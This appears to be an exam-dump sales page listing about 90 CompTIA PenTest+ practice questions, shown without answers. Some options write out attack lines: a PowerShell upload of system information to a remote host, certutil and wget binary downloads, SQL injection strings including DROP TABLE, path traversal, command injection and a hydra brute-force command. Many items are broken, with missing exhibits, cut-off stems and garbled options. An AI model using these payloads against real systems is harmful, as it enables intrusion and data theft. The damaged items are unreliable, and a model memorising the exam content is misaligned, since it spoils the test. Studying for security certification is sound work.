Month End Sale 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: exams65

ExamsBrite Dumps

CompTIA PenTest+ Certification Exam Question and Answers

CompTIA PenTest+ Certification Exam

Last Update May 23, 2025
Total Questions : 464

We are offering FREE PT0-002 CompTIA exam questions. All you do is to just go and sign up. Give your details, prepare PT0-002 free exam questions and then go for complete pool of CompTIA PenTest+ Certification Exam test questions that will help you more.

PT0-002 pdf

PT0-002 PDF

$36.75  $104.99
PT0-002 Engine

PT0-002 Testing Engine

$43.75  $124.99
PT0-002 PDF + Engine

PT0-002 PDF + Testing Engine

$57.75  $164.99
Questions 1

A penetration tester gains access to a system and is able to migrate to a user process:

Given the output above, which of the following actions is the penetration tester performing? (Choose two.)

Options:

A.  

Redirecting output from a file to a remote system

B.  

Building a scheduled task for execution

C.  

Mapping a share to a remote system

D.  

Executing a file on the remote system

E.  

Creating a new process on all domain systems

F.  

Setting up a reverse shell from a remote system

G.  

Adding an additional IP address on the compromised system

Discussion 0
Questions 2

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:

U3VQZXIkM2NyZXQhCg==

Which of the following commands should the tester use NEXT to decode the contents of the file?

Options:

A.  

echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d

B.  

tar zxvf password.txt

C.  

hydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24

D.  

john --wordlist /usr/share/seclists/rockyou.txt password.txt

Discussion 0
Questions 3

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)

Options:

A.  

Spawned shells

B.  

Created user accounts

C.  

Server logs

D.  

Administrator accounts

E.  

Reboot system

F.  

ARP cache

Discussion 0
Questions 4

A penetration tester runs the following command:

l.comptia.local axfr comptia.local

which of the following types of information would be provided?

Options:

A.  

The DNSSEC certificate and CA

B.  

The DHCP scopes and ranges used on the network

C.  

The hostnames and IP addresses of internal systems

D.  

The OS and version of the DNS server

Discussion 0
Questions 5

A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

Options:

A.  

Specially craft and deploy phishing emails to key company leaders.

B.  

Run a vulnerability scan against the company's external website.

C.  

Runtime the company's vendor/supply chain.

D.  

Scrape web presences and social-networking sites.

Discussion 0
Questions 6

Which of the following tools would be best suited to perform a cloud security assessment?

Options:

A.  

OpenVAS

B.  

Scout Suite

C.  

Nmap

D.  

ZAP

E.  

Nessus

Discussion 0
Questions 7

A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." Which of the following audiences was this message intended?

Options:

A.  

Systems administrators

B.  

C-suite executives

C.  

Data privacy ombudsman

D.  

Regulatory officials

Discussion 0
Questions 8

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?

Options:

A.  

nmap -iL results 192.168.0.10-100

B.  

nmap 192.168.0.10-100 -O > results

C.  

nmap -A 192.168.0.10-100 -oX results

D.  

nmap 192.168.0.10-100 | grep "results"

Discussion 0
Questions 9

Penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and )ut.. they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?

Options:

A.  

Conditional

B.  

Library

C.  

Dictionary

D.  

Sub application

Discussion 0
Questions 10

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

Options:

A.  

Add a web shell to the root of the website.

B.  

Upgrade the reverse shell to a true TTY terminal.

C.  

Add a new user with ID 0 to the /etc/passwd file.

D.  

Change the password of the root user and revert after the test.

Discussion 0
Questions 11

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

Options:

A.  

Cross-site scripting

B.  

Server-side request forgery

C.  

SQL injection

D.  

Log poisoning

E.  

Cross-site request forgery

F.  

Command injection

Discussion 0
Questions 12

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

Options:

A.  

To trick the systems administrator into installing a rootkit

B.  

To close down a reverse shell

C.  

To remove a web shell after the penetration test

D.  

To delete credentials the tester created

Discussion 0
Questions 13

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

Options:

A.  

Shoulder surfing

B.  

Call spoofing

C.  

Badge stealing

D.  

Tailgating

E.  

Dumpster diving

F.  

Email phishing

Discussion 0
Questions 14

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

Options:

A.  

Situational awareness

B.  

Rescheduling

C.  

DDoS defense

D.  

Deconfliction

Discussion 0
Questions 15

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

Options:

A.  

sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.

B.  

*range(1, 1025) on line 1 populated the portList list in numerical order.

C.  

Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM

D.  

The remoteSvr variable has neither been type-hinted nor initialized.

Discussion 0
Questions 16

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

Options:

A.  

Wireshark

B.  

Gattacker

C.  

tcpdump

D.  

Netcat

Discussion 0
Questions 17

A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

Options:

A.  

Nmap

B.  

Nikto

C.  

Cain and Abel

D.  

Ethercap

Discussion 0
Questions 18

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

Options:

A.  

Use Patator to pass the hash and Responder for persistence.

B.  

Use Hashcat to pass the hash and Empire for persistence.

C.  

Use a bind shell to pass the hash and WMI for persistence.

D.  

Use Mimikatz to pass the hash and PsExec for persistence.

Discussion 0
Questions 19

Which of the following OSSTM testing methodologies should be used to test under the worst conditions?

Options:

A.  

Tandem

B.  

Reversal

C.  

Semi-authorized

D.  

Known environment

Discussion 0
Questions 20

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

Options:

A.  

Executive summary

B.  

Remediation

C.  

Methodology

D.  

Metrics and measures

Discussion 0
Questions 21

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

Options:

A.  

Hydra and crunch

B.  

Netcat and cURL

C.  

Burp Suite and DIRB

D.  

Nmap and OWASP ZAP

Discussion 0
Questions 22

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

Options:

A.  

Sniff and then crack the WPS PIN on an associated WiFi device.

B.  

Dump the user address book on the device.

C.  

Break a connection between two Bluetooth devices.

D.  

Transmit text messages to the device.

Discussion 0
Questions 23

During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:

Which of the following was the script author trying to do?

Options:

A.  

Spawn a local shell.

B.  

Disable NIC.

C.  

List processes.

D.  

Change the MAC address

Discussion 0
Questions 24

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?

Options:

A.  

Weak authentication schemes

B.  

Credentials stored in strings

C.  

Buffer overflows

D.  

Non-optimized resource management

Discussion 0
Questions 25

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?

Options:

A.  

Password brute force attack

B.  

SQL injection

C.  

Password spraying

D.  

Kerberoasting

Discussion 0
Questions 26

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

Options:

A.  

Metadata service attack

B.  

Container escape techniques

C.  

Credential harvesting

D.  

Resource exhaustion

Discussion 0
Questions 27

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

Options:

A.  

inurl:

B.  

link:

C.  

site:

D.  

intitle:

Discussion 0
Questions 28

A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?

Options:

A.  

-а8 -T0

B.  

--script "http*vuln*"

C.  

-sn

D.  

-O -A

Discussion 0
Questions 29

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

Options:

A.  

Badge cloning

B.  

Watering-hole attack

C.  

Impersonation

D.  

Spear phishing

Discussion 0
Questions 30

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

Options:

A.  

After detection of a breach

B.  

After a merger or an acquisition

C.  

When an organization updates its network firewall configurations

D.  

When most of the vulnerabilities have been remediated

Discussion 0
Questions 31

Which of the following is the most secure method for sending the penetration test report to the client?

Options:

A.  

Sending the penetration test report on an online storage system.

B.  

Sending the penetration test report inside a password-protected ZIP file.

C.  

Sending the penetration test report via webmail using an HTTPS connection.

D.  

Encrypting the penetration test report with the client’s public key and sending it via email.

Discussion 0
Questions 32

During an assessment, a penetration tester inspected a log and found a series of thousands of requests coming from a single IP address to the same URL. A few of the requests are listed below.

Which of the following vulnerabilities was the attacker trying to exploit?

Options:

A.  

..Session hijacking

B.  

..URL manipulation

C.  

..SQL injection

D.  

..Insecure direct object reference

Discussion 0
Questions 33

Penetration tester who was exclusively authorized to conduct a physical assessment noticed there were no cameras pointed at the dumpster for company. The penetration tester returned at night and collected garbage that contained receipts for recently purchased networking :. The models of equipment purchased are vulnerable to attack. Which of the following is the most likely next step for the penetration?

Options:

A.  

Alert the target company of the discovered information.

B.  

Verify the discovered information is correct with the manufacturer.

C.  

Scan the equipment and verify the findings.

D.  

Return to the dumpster for more information.

Discussion 0
Questions 34

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?

Options:

A.  

Using OpenVAS in default mode

B.  

Using Nessus with credentials

C.  

Using Nmap as the root user

D.  

Using OWASP ZAP

Discussion 0
Questions 35

An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this device?

Options:

A.  

Encrypted passwords

B.  

System-hardening techniques

C.  

Multifactor authentication

D.  

Network segmentation

Discussion 0
Questions 36

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web the following actions should the penetration tester perform next?

Options:

A.  

Continue the assessment and mark the finding as critical.

B.  

Attempting to remediate the issue temporally.

C.  

Notify the primary contact immediately.

D.  

Shutting down the web server until the assessment is finished

Discussion 0
Questions 37

While performing the scanning phase of a penetration test, the penetration tester runs the following command:

........v -sV -p- 10.10.10.23-28

....ip scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try next?

Options:

A.  

-su

B.  

-pn

C.  

-sn

D.  

-ss

Discussion 0
Questions 38

A penetration tester wrote the following Bash script to brute force a local service password:

..ting as expected. Which of the following changes should the penetration tester make to get the script to work?

Options:

A.  

..e

cho "The correct password is $p" && break)

ho "The correct password is $p" I| break

B.  

.e

cho "The correct password is $p" && break)

o "The correct password is $p" I break

C.  

e

cho "The correct password is Sp" && break)

echo "The correct password is $p" && break)

D.  

.

{ echo "The correct password is $p" && break )

With

E.  

( echo "The correct password is $p" && break )

Discussion 0
Questions 39

A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

Options:

A.  

Credential harvesting

B.  

Privilege escalation

C.  

Password spraying

D.  

Domain record abuse

Discussion 0
Questions 40

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

Options:

A.  

Configure wireless access to use a AAA server.

B.  

Use random MAC addresses on the penetration testing distribution.

C.  

Install a host-based firewall on the penetration testing distribution.

D.  

Connect to the penetration testing company's VPS using a VPN.

Discussion 0
Questions 41

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

Options:

A.  

Nmap -s 445 -Pn -T5 172.21.0.0/16

B.  

Nmap -p 445 -n -T4 -open 172.21.0.0/16

C.  

Nmap -sV --script=smb* 172.21.0.0/16

D.  

Nmap -p 445 -max -sT 172. 21.0.0/16

Discussion 0
Questions 42

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?

Options:

A.  

Ensure the client has signed the SOW.

B.  

Verify the client has granted network access to the hot site.

C.  

Determine if the failover environment relies on resources not owned by the client.

D.  

Establish communication and escalation procedures with the client.

Discussion 0
Questions 43

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?

Options:

A.  

Pick a lock.

B.  

Disable the cameras remotely.

C.  

Impersonate a package delivery worker.

D.  

Send a phishing email.

Discussion 0
Questions 44

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

Options:

A.  

Reach out to the primary point of contact

B.  

Try to take down the attackers

C.  

Call law enforcement officials immediately

D.  

Collect the proper evidence and add to the final report

Discussion 0
Questions 45

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

Options:

A.  

Analyze the malware to see what it does.

B.  

Collect the proper evidence and then remove the malware.

C.  

Do a root-cause analysis to find out how the malware got in.

D.  

Remove the malware immediately.

E.  

Stop the assessment and inform the emergency contact.

Discussion 0
Questions 46

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

Options:

A.  

A list

B.  

A tree

C.  

A dictionary

D.  

An array

Discussion 0
Questions 47

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?

Options:

A.  

The tester had the situational awareness to stop the transfer.

B.  

The tester found evidence of prior compromise within the data set.

C.  

The tester completed the assigned part of the assessment workflow.

D.  

The tester reached the end of the assessment time frame.

Discussion 0
Questions 48

A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZE:214)

...

DOWNLOADED: 4612 – FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

Options:

A.  

index.html

B.  

about

C.  

info

D.  

home.html

Discussion 0
Questions 49

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

Options:

A.  

Whether the cloud service provider allows the penetration tester to test the environment

B.  

Whether the specific cloud services are being used by the application

C.  

The geographical location where the cloud services are running

D.  

Whether the country where the cloud service is based has any impeding laws

Discussion 0
Questions 50

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

Options:

A.  

ROE

B.  

SLA

C.  

MSA

D.  

NDA

Discussion 0
Questions 51

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

Options:

A.  

Follow the established data retention and destruction process

B.  

Report any findings to regulatory oversight groups

C.  

Publish the findings after the client reviews the report

D.  

Encrypt and store any client information for future analysis

Discussion 0
Questions 52

Appending string values onto another string is called:

Options:

A.  

compilation

B.  

connection

C.  

concatenation

D.  

conjunction

Discussion 0
Questions 53

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

Options:

A.  

The HTTP port is not open on the firewall.

B.  

The tester did not run sudo before the command.

C.  

The web server is using HTTPS instead of HTTP.

D.  

This URI returned a server error.

Discussion 0
Questions 54

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

Options:

A.  

Open-source research

B.  

A ping sweep

C.  

Traffic sniffing

D.  

Port knocking

E.  

A vulnerability scan

F.  

An Nmap scan

Discussion 0
Questions 55

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Options:

A.  

Nessus

B.  

ProxyChains

C.  

OWASPZAP

D.  

Empire

Discussion 0
Questions 56

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

Options:

A.  

Acceptance by the client and sign-off on the final report

B.  

Scheduling of follow-up actions and retesting

C.  

Attestation of findings and delivery of the report

D.  

Review of the lessons learned during the engagement

Discussion 0
Questions 57

A penetration tester conducted an assessment on a web server. The logs from this session show the following:

http://www.thecompanydomain.com/servicestatus.php?serviceID=892 &serviceID=892 ‘ ; DROP TABLE SERVICES; --

Which of the following attacks is being attempted?

Options:

A.  

Clickjacking

B.  

Session hijacking

C.  

Parameter pollution

D.  

Cookie hijacking

E.  

Cross-site scripting

Discussion 0
Questions 58

A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Options:

A.  

Edit the discovered file with one line of code for remote callback

B.  

Download .pl files and look for usernames and passwords

C.  

Edit the smb.conf file and upload it to the server

D.  

Download the smb.conf file and look at configurations

Discussion 0
Questions 59

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Options:

A.  

Perform forensic analysis to isolate the means of compromise and determine attribution.

B.  

Incorporate the newly identified method of compromise into the red team’s approach.

C.  

Create a detailed document of findings before continuing with the assessment.

D.  

Halt the assessment and follow the reporting procedures as outlined in the contract.

Discussion 0
Questions 60

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

Options:

A.  

The CVSS score of the finding

B.  

The network location of the vulnerable device

C.  

The vulnerability identifier

D.  

The client acceptance form

E.  

The name of the person who found the flaw

F.  

The tool used to find the issue

Discussion 0
Questions 61

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:

    Have a full TCP connection

    Send a “hello” payload

    Walt for a response

    Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Options:

A.  

Run nmap –Pn –sV –script vuln .

B.  

Employ an OpenVAS simple scan against the TCP port of the host.

C.  

Create a script in the Lua language and use it with NSE.

D.  

Perform a credentialed scan with Nessus.

Discussion 0
Questions 62

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

Options:

A.  

The libraries may be vulnerable

B.  

The licensing of software is ambiguous

C.  

The libraries’ code bases could be read by anyone

D.  

The provenance of code is unknown

E.  

The libraries may be unsupported

F.  

The libraries may break the application

Discussion 0
Questions 63

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

Options:

A.  

Scraping social media sites

B.  

Using the WHOIS lookup tool

C.  

Crawling the client’s website

D.  

Phishing company employees

E.  

Utilizing DNS lookup tools

F.  

Conducting wardriving near the client facility

Discussion 0
Questions 64

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

Options:

A.  

MD5

B.  

bcrypt

C.  

SHA-1

D.  

PBKDF2

Discussion 0
Questions 65

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

Options:

A.  

Data flooding

B.  

Session riding

C.  

Cybersquatting

D.  

Side channel

Discussion 0
Questions 66

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?

Options:

A.  

Socat

B.  

tcpdump

C.  

Scapy

D.  

dig

Discussion 0
Questions 67

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

Options:

A.  

The penetration tester conducts a retest.

B.  

The penetration tester deletes all scripts from the client machines.

C.  

The client applies patches to the systems.

D.  

The client clears system logs generated during the test.

Discussion 0
Questions 68

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

Options:

A.  

NIST SP 800-53

B.  

OWASP Top 10

C.  

MITRE ATT&CK framework

D.  

PTES technical guidelines

Discussion 0
Questions 69

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Discussion 0
Questions 70

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:

A.  

Executive summary of the penetration-testing methods used

B.  

Bill of materials including supplies, subcontracts, and costs incurred during assessment

C.  

Quantitative impact assessments given a successful software compromise

D.  

Code context for instances of unsafe type-casting operations

Discussion 0
Questions 71

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?

Options:

A.  

Hashcat

B.  

Mimikatz

C.  

Patator

D.  

John the Ripper

Discussion 0
Questions 72

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

Options:

A.  

DNS cache poisoning

B.  

MAC spoofing

C.  

ARP poisoning

D.  

Double-tagging attack

Discussion 0
Questions 73

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

Options:

A.  

Enforce mandatory employee vacations

B.  

Implement multifactor authentication

C.  

Install video surveillance equipment in the office

D.  

Encrypt passwords for bank account information

Discussion 0
Questions 74

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.

Which of the following is the penetration tester trying to accomplish?

Options:

A.  

Uncover potential criminal activity based on the evidence gathered.

B.  

Identify all the vulnerabilities in the environment.

C.  

Limit invasiveness based on scope.

D.  

Maintain confidentiality of the findings.

Discussion 0
Questions 75

A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s router.

Which of the following is MOST vulnerable to a brute-force attack?

Options:

A.  

WPS

B.  

WPA2-EAP

C.  

WPA-TKIP

D.  

WPA2-PSK

Discussion 0
Questions 76

A penetration tester performs the following command:

curl –I –http2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

Options:

A.  

Option A

B.  

Option B

C.  

Option C

D.  

Option D

Discussion 0
Questions 77

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.

Which of the following describes the scope of the assessment?

Options:

A.  

Partially known environment testing

B.  

Known environment testing

C.  

Unknown environment testing

D.  

Physical environment testing

Discussion 0
Questions 78

A penetration tester runs the following command on a system:

find / -user root –perm -4000 –print 2>/dev/null

Which of the following is the tester trying to accomplish?

Options:

A.  

Set the SGID on all files in the / directory

B.  

Find the /root directory on the system

C.  

Find files with the SUID bit set

D.  

Find files that were created during exploitation and move them to /dev/null

Discussion 0
Questions 79

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

Options:

A.  

B.  

../../../../../../../../../../etc/passwd

C.  

/var/www/html/index.php;whoami

D.  

1 UNION SELECT 1, DATABASE(),3--

Discussion 0
Questions 80

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

Options:

A.  

S/MIME

B.  

FTPS

C.  

DNSSEC

D.  

AS2

Discussion 0
Questions 81

A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

Options:

A.  

Windows

B.  

Apple

C.  

Linux

D.  

Android

Discussion 0
Questions 82

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

Options:

A.  

Key reinstallation

B.  

Deauthentication

C.  

Evil twin

D.  

Replay

Discussion 0
Questions 83

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

Options:

A.  

NDA

B.  

MSA

C.  

SOW

D.  

MOU

Discussion 0
Questions 84

A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:

• The following request was intercepted going to the network device:

GET /login HTTP/1.1

Host: 10.50.100.16

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk

• Network management interfaces are available on the production network.

• An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

Options:

A.  

Enforce enhanced password complexity requirements.

B.  

Disable or upgrade SSH daemon.

C.  

Disable HTTP/301 redirect configuration.

D.  

Create an out-of-band network for management.

E.  

Implement a better method for authentication.

F.  

Eliminate network management and control interfaces.

Discussion 0
Questions 85

A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Options:

A.  

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

B.  

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the

engagement

C.  

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

D.  

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

E.  

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

F.  

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

Discussion 0
Questions 86

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

    Pre-engagement interaction (scoping and ROE)

    Intelligence gathering (reconnaissance)

    Threat modeling

    Vulnerability analysis

    Exploitation and post exploitation

    Reporting

Which of the following methodologies does the client use?

Options:

A.  

OWASP Web Security Testing Guide

B.  

PTES technical guidelines

C.  

NIST SP 800-115

D.  

OSSTMM

Discussion 0
Questions 87

A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company’s request?

Options:

A.  

The reverse-engineering team may have a history of selling exploits to third parties.

B.  

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

C.  

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

D.  

The reverse-engineering team will be given access to source code for analysis.

Discussion 0
Questions 88

In Java and C/C++, variable initialization is critical because:

Options:

A.  

the unknown value, when used later, will cause unexpected behavior.

B.  

the compiler will assign null to the variable, which will cause warnings and errors.

C.  

the initial state of the variable creates a race condition.

D.  

the variable will not have an object type assigned to it.

Discussion 0
Questions 89

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

Options:

A.  

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.  

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.  

schtasks /query /fo LIST /v | find /I “Next Run Time:”

D.  

wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Discussion 0
Questions 90

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

Options:

A.  

Bluejacking

B.  

Bluesnarfing

C.  

BLE attack

D.  

WPS PIN attack

Discussion 0
Questions 91

Options:

A.  

